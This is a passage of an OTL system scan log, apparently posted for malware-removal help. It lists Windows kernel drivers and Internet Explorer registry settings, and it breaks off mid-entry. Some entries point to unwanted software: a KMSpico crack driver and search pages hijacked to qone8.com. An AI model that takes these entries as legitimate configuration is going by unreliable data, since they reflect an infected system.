| 000,226,304 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BthLEEnum.sys -- (BthLEEnum) DRV:[b]64bit:[/b] - [2014-05-14 15:59:57 | 000,054,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr) DRV:[b]64bit:[/b] - [2014-05-14 15:59:38 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus) DRV:[b]64bit:[/b] - [2014-05-14 15:59:37 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101) DRV:[b]64bit:[/b] - [2014-05-14 15:59:26 | 000,018,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vhdparser.sys -- (vhdparser) DRV:[b]64bit:[/b] - [2014-05-14 15:59:20 | 000,384,856 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport) DRV:[b]64bit:[/b] - [2014-03-31 18:42:44 | 000,040,392 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvvad64v.sys -- (nvvad_WaveExtensible) DRV:[b]64bit:[/b] - [2014-03-24 04:30:57 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter) DRV:[b]64bit:[/b] - [2014-03-24 04:30:57 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv) DRV:[b]64bit:[/b] - [2014-03-24 04:27:03 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot) DRV:[b]64bit:[/b] - [2014-03-22 14:09:43 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\passthruparser.sys -- (passthruparser) DRV:[b]64bit:[/b] - [2014-03-22 14:09:42 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lunparser.sys -- (lunparser) DRV:[b]64bit:[/b] - [2014-03-22 14:09:41 | 000,068,960 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\hvservice.sys -- (hvservice) DRV:[b]64bit:[/b] - [2014-03-22 14:09:34 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\pvhdparser.sys -- (pvhdparser) DRV:[b]64bit:[/b] - [2014-03-20 05:41:20 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS) DRV:[b]64bit:[/b] - [2014-03-17 19:13:32 | 000,035,376 | ---- | M] (Basil Projects) [Kernel | On_Demand | Stopped] -- C:\Program Files\KMSpico\WinDivert.sys -- (WinDivert1.1) DRV:[b]64bit:[/b] - [2014-03-13 14:35:24 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\windows\SysNative\drivers\wof.sys -- (Wof) DRV:[b]64bit:[/b] - [2014-03-08 22:40:16 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS) DRV:[b]64bit:[/b] - [2014-03-08 22:35:45 | 000,467,800 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3) DRV:[b]64bit:[/b] - [2014-03-04 11:27:53 | 000,691,200 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSVSP) DRV:[b]64bit:[/b] - [2014-03-04 11:27:53 | 000,691,200 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSVSF) DRV:[b]64bit:[/b] - [2014-03-04 11:27:53 | 000,691,200 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSP) DRV:[b]64bit:[/b] - [2014-03-04 11:27:53 | 000,691,200 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSMP) DRV:[b]64bit:[/b] - [2014-01-28 16:32:18 | 000,593,000 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter) DRV:[b]64bit:[/b] - [2014-01-22 08:52:10 | 000,206,080 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudmdm.sys -- (ssudmdm) DRV:[b]64bit:[/b] - [2014-01-22 08:52:10 | 000,108,800 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudbus.sys -- (dg_ssudbus) DRV:[b]64bit:[/b] - [2013-11-30 13:42:06 | 000,314,016 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\atksgt.sys -- (atksgt) DRV:[b]64bit:[/b] - [2013-11-30 13:42:06 | 000,043,680 | ---- | M] () [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\lirsgt.sys -- (lirsgt) DRV:[b]64bit:[/b] - [2013-11-29 18:43:00 | 000,140,560 | ---- | M] (Oracle Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys -- (VBoxNetAdp) DRV:[b]64bit:[/b] - [2013-11-29 04:32:14 | 000,838,872 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168) DRV:[b]64bit:[/b] - [2013-11-11 04:48:41 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep) DRV:[b]64bit:[/b] - [2013-11-04 04:32:06 | 000,020,280 | ---- | M] (ASUS) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AsHIDSwitch64.sys -- (HIDSwitch) DRV:[b]64bit:[/b] - [2013-11-01 13:39:53 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc) DRV:[b]64bit:[/b] - [2013-10-26 03:54:32 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2) DRV:[b]64bit:[/b] - [2013-10-05 17:25:54 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme) DRV:[b]64bit:[/b] - [2013-10-01 14:02:30 | 004,177,920 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx) DRV:[b]64bit:[/b] - [2013-09-14 16:06:57 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt) DRV:[b]64bit:[/b] - [2013-08-23 01:14:15 | 000,022,272 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\kbldfltr.sys -- (kbldfltr) DRV:[b]64bit:[/b] - [2013-08-23 01:14:13 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport) DRV:[b]64bit:[/b] - [2013-08-23 01:14:05 | 000,220,672 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Vid.sys -- (Vid) DRV:[b]64bit:[/b] - [2013-08-23 01:14:05 | 000,129,536 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vmbusr.sys -- (vmbusr) DRV:[b]64bit:[/b] - [2013-08-23 01:14:05 | 000,068,608 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\storvsp.sys -- (storvsp) DRV:[b]64bit:[/b] - [2013-08-23 01:14:05 | 000,065,536 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vpcivsp.sys -- (vpcivsp) DRV:[b]64bit:[/b] - [2013-08-23 01:14:05 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt) DRV:[b]64bit:[/b] - [2013-08-23 00:51:12 | 000,039,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible) DRV:[b]64bit:[/b] - [2013-08-23 00:51:12 | 000,026,008 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus) DRV:[b]64bit:[/b] - [2013-08-22 15:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv) DRV:[b]64bit:[/b] - [2013-08-22 15:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec) DRV:[b]64bit:[/b] - [2013-08-22 14:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam) DRV:[b]64bit:[/b] - [2013-08-22 14:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex) DRV:[b]64bit:[/b] - [2013-08-22 14:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM) DRV:[b]64bit:[/b] - [2013-08-22 14:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis) DRV:[b]64bit:[/b] - [2013-08-22 14:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS) DRV:[b]64bit:[/b] - [2013-08-22 14:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD) DRV:[b]64bit:[/b] - [2013-08-22 14:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware) DRV:[b]64bit:[/b] - [2013-08-22 14:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata) DRV:[b]64bit:[/b] - [2013-08-22 14:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv) DRV:[b]64bit:[/b] - [2013-08-22 14:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass) DRV:[b]64bit:[/b] - [2013-08-22 14:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata) DRV:[b]64bit:[/b] - [2013-08-22 14:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID) DRV:[b]64bit:[/b] - [2013-08-22 14:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor) DRV:[b]64bit:[/b] - [2013-08-22 14:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor) DRV:[b]64bit:[/b] - [2013-08-22 14:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci) DRV:[b]64bit:[/b] - [2013-08-22 14:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx) DRV:[b]64bit:[/b] - [2013-08-22 14:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx) DRV:[b]64bit:[/b] - [2013-08-22 14:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI) DRV:[b]64bit:[/b] - [2013-08-22 14:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci) DRV:[b]64bit:[/b] - [2013-08-22 14:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr) DRV:[b]64bit:[/b] - [2013-08-22 13:39:58 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDPrint.sys -- (WSDPrintDevice) DRV:[b]64bit:[/b] - [2013-08-22 13:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache) DRV:[b]64bit:[/b] - [2013-08-22 13:39:50 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WSDScan.sys -- (WSDScan) DRV:[b]64bit:[/b] - [2013-08-22 13:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay) DRV:[b]64bit:[/b] - [2013-08-22 13:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo) DRV:[b]64bit:[/b] - [2013-08-22 13:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf) DRV:[b]64bit:[/b] - [2013-08-22 13:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime) DRV:[b]64bit:[/b] - [2013-08-22 13:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr) DRV:[b]64bit:[/b] - [2013-08-22 13:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg) DRV:[b]64bit:[/b] - [2013-08-22 13:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic) DRV:[b]64bit:[/b] - [2013-08-22 13:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter) DRV:[b]64bit:[/b] - [2013-08-22 13:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig) DRV:[b]64bit:[/b] - [2013-08-22 13:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid) DRV:[b]64bit:[/b] - [2013-08-22 13:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd) DRV:[b]64bit:[/b] - [2013-08-22 13:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD) DRV:[b]64bit:[/b] - [2013-08-22 13:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum) DRV:[b]64bit:[/b] - [2013-08-22 13:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt) DRV:[b]64bit:[/b] - [2013-08-22 13:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c) DRV:[b]64bit:[/b] - [2013-08-22 13:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc) DRV:[b]64bit:[/b] - [2013-08-22 13:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc) DRV:[b]64bit:[/b] - [2013-08-22 13:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus) DRV:[b]64bit:[/b] - [2013-08-22 13:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatformMp) DRV:[b]64bit:[/b] - [2013-08-22 13:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform) DRV:[b]64bit:[/b] - [2013-08-22 13:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp) DRV:[b]64bit:[/b] - [2013-08-22 13:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu) DRV:[b]64bit:[/b] - [2013-08-22 10:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM) DRV:[b]64bit:[/b] - [2013-08-14 04:42:44 | 003,837,440 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athwbx.sys -- (athr) DRV:[b]64bit:[/b] - [2013-08-13 01:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2) DRV:[b]64bit:[/b] - [2013-08-10 02:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV) DRV:[b]64bit:[/b] - [2013-07-30 20:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO) DRV:[b]64bit:[/b] - [2013-07-25 21:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C) DRV:[b]64bit:[/b] - [2013-05-30 17:16:40 | 000,064,280 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGSHidFilt.Sys -- (LGSHidFilt) DRV:[b]64bit:[/b] - [2013-03-18 17:51:08 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64) DRV:[b]64bit:[/b] - [2013-02-06 16:59:06 | 000,065,784 | ---- | M] (ASUS Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AsusTP.sys -- (ATP) DRV:[b]64bit:[/b] - [2013-01-09 04:26:24 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud) DRV:[b]64bit:[/b] - [2012-10-08 11:47:42 | 000,298,640 | R--- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RtsBaStor.sys -- (RSBASTOR) DRV:[b]64bit:[/b] - [2012-09-14 07:15:10 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA) DRV:[b]64bit:[/b] - [2012-08-21 14:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM) DRV:[b]64bit:[/b] - [2012-08-02 05:22:48 | 000,014,992 | ---- | M] ( ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kbfiltr.sys -- (kbfiltr) DRV:[b]64bit:[/b] - [2012-07-17 19:12:08 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64) DRV:[b]64bit:[/b] - [2012-05-30 14:10:50 | 000,016,168 | ---- | M] (Intel(R) Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\TurboB.sys -- (TurboB) DRV:[b]64bit:[/b] - [2011-07-15 06:13:12 | 000,023,552 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\OAfilt.sys -- (OAfilt) DRV:[b]64bit:[/b] - [2010-06-19 01:36:04 | 000,017,920 | ---- | M] (Siliten) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\InputFilter_FlexDef2b.sys -- (InputFilter_Hid_FlexDef2b) DRV:[b]64bit:[/b] - [2009-11-24 02:38:00 | 000,016,008 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGVirHid.sys -- (LGVirHid) DRV:[b]64bit:[/b] - [2009-11-24 02:37:50 | 000,022,408 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGBusEnum.sys -- (LGBusEnum) DRV:[b]64bit:[/b] - [2009-09-15 13:59:30 | 000,042,088 | ---- | M] (NVIDIA Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvoclk64.sys -- (nvoclk64) DRV:[b]64bit:[/b] - [2008-08-08 16:31:26 | 000,062,960 | ---- | M] (Your Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\h648103.sys -- (h648103) DRV:[b]64bit:[/b] - [2008-08-08 16:31:22 | 000,065,776 | ---- | M] (Your Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\h648101.sys -- (h648101) DRV:[b]64bit:[/b] - [2008-08-08 16:31:20 | 000,063,856 | ---- | M] (Your Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\h647906.sys -- (h647906) DRV - [2011-09-07 10:55:04 | 000,017,536 | ---- | M] (ASUS) [Kernel | System | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATK WMIACPI\atkwmiacpi64.sys -- (ATKWMIACPIIO) DRV - [2009-07-02 18:36:14 | 000,015,416 | ---- | M] (ASUS) [Kernel | Auto | Running] -- C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\ASMMAP64.sys -- (ASMMAP64) DRV - [2008-08-08 16:31:18 | 000,043,192 | ---- | M] (Your Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\hid8101.sys -- (hid8101) DRV - [2008-08-08 16:31:18 | 000,040,856 | ---- | M] (Your Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\hid8103.sys -- (hid8103) DRV - [2008-08-08 16:31:16 | 000,041,272 | ---- | M] (Your Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\hid7906.sys -- (hid7906) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qone8.com/web/?type=ds&ts=1401808341&from=tt4u&uid=WDCXWD5000LPVX-80V0TT0_WD-WX31A437749377493&q={searchTerms} IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.qone8.com/web/?type=ds&ts=1401808341&from=tt4u&uid=WDCXWD5000LPVX-80V0TT0_WD-WX31A437749377493&q={searchTerms} IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qone8.com/web/?type=ds&ts=1401808341&from=tt4u&uid=WDCXWD5000LPVX-80V0TT0_WD-WX31A437749377493&q={searchTerms} IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.qone8.com/web/?type=ds&ts=1401808341&from=tt4u&uid=WDCXWD5000LPVX-80V0TT0_WD-WX31A437749377493&q={searchTerms} IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = 